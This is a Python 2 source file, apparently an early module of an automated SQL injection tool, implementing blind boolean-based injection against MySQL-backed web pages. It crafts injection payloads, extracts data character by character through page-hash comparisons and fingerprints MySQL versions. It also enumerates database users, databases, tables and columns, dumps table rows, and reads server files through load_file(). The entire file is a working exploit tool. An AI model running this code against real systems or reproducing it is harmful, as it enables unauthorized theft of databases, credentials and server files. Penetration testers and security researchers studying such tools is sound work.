#!/usr/bin/env python


import random
import re
import time

from common import Common


class MySqlMap(Common):
    __has_information_schema = False
    __fingerprint            = ''
    __banner                 = ''
    __current_db             = ''
    __cached_dbs             = []
    __cached_tables          = {}
    __cached_columns         = {}


    def __unescape(self, expression):
        while True:
            index = expression.find("'")
            if index == -1:
                break

            first_index = index + 1
            index = expression[first_index:].find("'")

            if index == -1:
                raise Exception, "Unenclosed ' in '%s'" % expression

            last_index = first_index + index
            old = "'%s'" % expression[first_index:last_index]
            unescaped = ""

            for i in range(first_index, last_index):
                unescaped += "%d" % (ord(expression[i]))
                if i < last_index - 1:
                    unescaped += ","

            expression = expression.replace(old, "CHAR(%s)" % unescaped)

        return expression


    def __create_stm(self):
        if self.args.injection_method == 'numeric':
            evil_stm  = " AND ORD(MID((%s),%d,1)) > %d"
        elif self.args.injection_method == 'stringsingle':
            evil_stm  = "' AND ORD(MID((%s),%d,1)) > %d AND '1"
        elif self.args.injection_method == 'stringdouble':
            evil_stm  = '" AND ORD(MID((%s),%d,1)) > %d AND "1'

        return evil_stm


    def __get_value(self, expression):
        self.log("query: %s" % expression)
        expr = self.__unescape(expression)
        start = time.time()
        end = False
        count = 0
        i = 0
        value = ''

        evil_stm = self.__create_stm()
        base_url = self.url_replace_parameter(newvalue=evil_stm)

        while end != True:
            i = i + 1
            max = 127
            min = 0

            while (max - min) != 1:
                count += 1
                limit = ((max + min) / 2)

                evil_url = base_url % (expr, i, limit)
                evil_hash = self.hash_page(evil_url)

                if evil_hash == self.args.default_hash:
                    min = limit
                else:
                    max = limit

                if (max - min) == 1:
                    if max == 1:
                        end = True
                        break
                    val = chr(min+1)
                    value = value + val

        duration = int(time.time() - start)
        self.log("performed %d queries in %d seconds" % (count, duration))
        self.log("retrieved: %s" % value)

        return value


    def get_fingerprint(self):
        if self.__banner:
            version = re.search('^([\d\.]+)',
                      self.__banner, re.I).groups()[0]
            if '-log' in self.__banner:
                return "%s (probably %s and logging enabled)" % (self.__fingerprint, version)
            else:
                return "%s (probably %s)" % (self.__fingerprint, version)
        else:
            return self.__fingerprint


    def get_banner(self):
        self.log("fetching banner")
        return self.__banner


    def get_current_db(self):
        self.log("fetching current database")
        if self.__current_db:
            return self.__current_db
        else:
            return self.__get_value("database()")


    def get_current_user(self):
        self.log("fetching current user")
        return self.__get_value("current_user()")


    def get_users(self):
        self.log("fetching users")
        stm  = "SELECT count(distinct(user)) "
        stm += "FROM mysql.user"

        self.log("fetching number of database users")
        count = self.__get_value(stm)

        if not len(count) or count == "0":
            err_msg = "unable to retrieve the number of database users"
            raise Exception, err_msg

        users = []

        self.log("fetching database users")
        for index in range(int(count)):
            stm  = "SELECT distinct(user) "
            stm += "FROM mysql.user LIMIT %d, 1" % index

            user = self.__get_value(stm)
            users.append(user)

        if not users:
            raise Exception, "unable to retrieve the database users"

        return users


    def get_dbs(self):
        if not self.__has_information_schema:
            warn_msg  = "information_schema not available, "
            warn_msg += "remote database is MySQL < 5. database "
            warn_msg += "names will be fetched from 'mysql' table"
            self.warn(warn_msg)

            stm  = "SELECT count(distinct(db)) FROM mysql.db"
        else:
            stm  = "SELECT count(distinct(schema_name)) "
            stm += "FROM information_schema.schemata"

        self.log("fetching number of databases")
        count = self.__get_value(stm)

        if not len(count) or count == "0":
            err_msg = "unable to retrieve the number of databases"
            raise Exception, err_msg

        dbs = []

        self.log("fetching database names")
        for index in range(int(count)):
            if not self.__has_information_schema:
                stm  = "SELECT distinct(db) "
                stm += "FROM mysql.db LIMIT %d, 1" % index
            else:
                stm  = "SELECT distinct(schema_name) "
                stm += "FROM information_schema.schemata LIMIT %d, 1" % index

            db = self.__get_value(stm)
            dbs.append(db)

        if dbs:
            self.__cached_dbs = dbs
        else:
            raise Exception, "unable to retrieve the database names"

        return dbs


    def get_tables(self):
        if not self.__has_information_schema:
            err_msg  = "information_schema not available, "
            err_msg += "remote database is MySQL < 5"
            raise Exception, err_msg

        if not self.args.db:
            if not len(self.__cached_dbs):
                dbs = self.get_dbs()
            else:
                dbs = self.__cached_dbs
        else:
            if ',' in self.args.db:
                dbs = self.args.db.split(',')
            else:
                dbs = [self.args.db]

        db_tables = {}

        for db in dbs:
            stm  = "SELECT count(distinct(table_name)) "
            stm += "FROM information_schema.tables "
            stm += "WHERE table_schema LIKE '%s'" % db

            self.log("fetching number of tables for database '%s'" % db)
            count = self.__get_value(stm)

            if not len(count) or count == "0":
                warn_msg  = "unable to retrieve the number of "
                warn_msg += "tables for database '%s'" % db
                self.warn(warn_msg)
                continue

            tables = []

            self.log("fetching tables for database '%s'" % db)
            for index in range(int(count)):
                stm  = "SELECT distinct(table_name) "
                stm += "FROM information_schema.tables "
                stm += "WHERE table_schema LIKE '%s' LIMIT %d, 1" % (db, index)

                table = self.__get_value(stm)
                tables.append(table)

            if tables:
                db_tables[db] = tables
            else:
                warn_msg  = "unable to retrieve the tables "
                warn_msg += "for database '%s'" % db
                self.warn(warn_msg)

        if db_tables:
            self.__cached_tables = db_tables
        elif not self.args.db:
            err_msg  = "unable to retrieve the "
            err_msg += "tables for any database"
            raise Exception, err_msg

        return db_tables


    def get_columns(self):
        if not self.__has_information_schema:
            err_msg  = "information_schema not available, "
            err_msg += "remote database is MySQL < 5"
            raise Exception, err_msg

        if not self.args.table:
            raise Exception, "missing table parameter"
        else:
            stm  = "SELECT count(distinct(column_name)) "
            stm += "FROM information_schema.columns "

            if '.' in self.args.table:
                self.args.db, self.args.table = self.args.table.split('.')
            stm += "WHERE table_name LIKE '%s' " % self.args.table

        if self.args.db:
            stm += "AND table_schema LIKE '%s'" % self.args.db

        if self.args.db:
            self.log("fetching number of columns for table '%s' on database '%s'" %
                     (self.args.table, self.args.db))
        else:
            self.log("fetching number of columns for table '%s'" % self.args.table)
        count = self.__get_value(stm)

        if not len(count) or count == "0":
            err_msg  = "unable to retrieve the number of columns "
            err_msg += "for table '%s' " %self.args.table
            if self.args.db:
                err_msg += "on database '%s'" % self.args.db
            raise Exception, err_msg

        db_table_columns = {}
        table = {}
        columns = {}

        if self.args.db:
            self.log("fetching columns for table '%s' on database '%s'" %
                     (self.args.table, self.args.db))
        else:
            self.log("fetching columns for table '%s'" % self.args.table)
        for index in range(int(count)):
            stm  = "SELECT distinct(column_name) "
            stm += "FROM information_schema.columns "
            stm += "WHERE table_name LIKE '%s' " % self.args.table
            if self.args.db:
                stm += "AND table_schema LIKE '%s' " % self.args.db
            stm += "LIMIT %d, 1" % index

            column = self.__get_value(stm)

            stm  = "SELECT data_type "
            stm += "FROM information_schema.columns "
            stm += "WHERE table_name LIKE '%s' " % self.args.table
            stm += "AND column_name LIKE '%s' " % column
            if self.args.db:
                stm += "AND table_schema LIKE '%s'" % self.args.db

            coltype = self.__get_value(stm)
            columns[column] = coltype

        if columns:
            table[self.args.table] = columns
            db_table_columns[self.args.db] = table
        else:
            err_msg  = "unable to retrieve the columns for table "
            err_msg += "'%s' on database '%s'" % (self.args.table, self.args.db)
            raise Exception, err_msg

        self.__cached_columns[self.args.table] = columns

        return db_table_columns


    def dump_table(self):
        if not self.__has_information_schema:
            err_msg  = "information_schema not available, "
            err_msg += "remote database is MySQL < 5"
            raise Exception, err_msg

        if not self.args.table:
            raise Exception, "missing table parameter"

        if not self.__cached_columns:
            self.__cached_columns = self.get_columns()

        if self.args.db:
            from_expr = "%s.%s" % (self.args.db, self.args.table)
        else:
            from_expr = self.args.table

        db_table_values = {}
        stm  = "SELECT count(*) FROM %s" % from_expr

        if self.args.db:
            self.log("fetching number of rows for table '%s' on database '%s'" %
                     (self.args.table, self.args.db))
        else:
            self.log("fetching number of rows for table '%s'" % self.args.table)
        count = self.__get_value(stm)

        if not len(count) or count == "0":
            err_msg  = "unable to retrieve the number of rows "
            err_msg += "for table '%s' " % self.args.table
            if self.args.db:
                err_msg += "on database '%s'" % self.args.db
            raise Exception, err_msg

        for column in self.__cached_columns[self.args.db][self.args.table].keys():
            length = 0
            values = []
            column_data = {}
            db_table_values[column] = {}

            self.log("fetching values of column '%s' for table '%s' on database '%s'" %
                     (column, self.args.table, self.args.db))
            for index in range(int(count)):
                stm  = "SELECT %s FROM %s LIMIT %d, 1" % (column, from_expr, index)
                value = self.__get_value(stm)

                length = max(length, len(str(value)))
                values.append(value)

            if length < len(column):
                column_data['length'] = len(column)
            else:
                column_data['length'] = length
            column_data['values'] = values
            db_table_values[column] = column_data

        if db_table_values:
            infos = {}

            if self.args.db:
                infos['db'] = self.args.db
            else:
                infos['db'] = None
            infos['table'] = self.args.table
            infos['count'] = count

            db_table_values['__infos__'] = infos
        else:
            err_msg  = "unable to retrieve the values for "
            err_msg += "table '%s'" % self.args.table
            if self.args.db:
                err_msg += "on database '%s'" % self.args.db
            raise Exception, err_msg

        return db_table_values


    def get_file(self, filename):
        self.log("reading file: %s" % filename)
        return self.__get_value("load_file('%s')" % filename)


    def get_expression(self, expression):
        return self.__get_value(expression)


    def check_dbms(self):
        self.log("testing MySQL")
        random_int = str(random.randint(1, 9))
        stm = "CONCAT('%s', '%s')" % (random_int, random_int)

        if self.__get_value(stm) == (random_int * 2):
            stm  = "SELECT %s " % random_int
            stm += "FROM information_schema.tables "
            stm += "LIMIT 0, 1"

            if self.__get_value(stm) == str(random_int):
                self.__has_information_schema = True

                self.__current_db = self.__get_value("database()")
                if self.__current_db == self.__get_value("schema()"):
                    self.__fingerprint = "MySQL >= 5.0.2 and MySQL < 5.1"

                    stm  = "SELECT %s " % random_int
                    stm += "FROM information_schema.partitions "
                    stm += "LIMIT 0, 1"

                    if self.__get_value(stm) == str(random_int):
                        self.__fingerprint = "MySQL >= 5.1"
                else:
                    self.__fingerprint = "MySQL = 5.0.[0|1]"
            else:
                self.__fingerprint = "MySQL < 5.0"

                coercibility = self.__get_value("COERCIBILITY(user())")
                if coercibility == "3":
                    self.__fingerprint = "MySQL >= 4.1.11 and MySQL < 5.0"
                elif coercibility == "2":
                    self.__fingerprint = "MySQL >= 4.1.1 and MySQL < 4.1.11"
                elif self.__get_value("current_user()"):
                    self.__fingerprint = "MySQL >= 4.0.6 and MySQL < 4.1.1"

                    if self.__get_value("CHARSET(current_user())") == 'utf8':
                        self.__fingerprint = "MySQL = 4.1.0"
                    else:
                        self.__fingerprint = "MySQL >= 4.0.6 and MySQL < 4.1.0"
                elif self.__get_value("FOUND_ROWS()") == "0":
                    self.__fingerprint = "MySQL >= 4.0.0 and MySQL < 4.0.6"
                elif self.__get_value("CONNECTION_ID()"):
                    self.__fingerprint = "MySQL >= 3.23.14 and MySQL < 4.0"
                elif re.search("@[\w\.\-\_]+", self.__get_value("USER()"), re.I):
                    self.__fingerprint = "MySQL >= 3.22.11 and MySQL < 3.23.14"
                else:
                    self.__fingerprint = "MySQL < 3.22"

            self.__banner = self.__get_value("version()")
        else:
            self.warn("remote database is not MySQL")
            return False

        return True


    def __init__(self, args):
        self.args = args
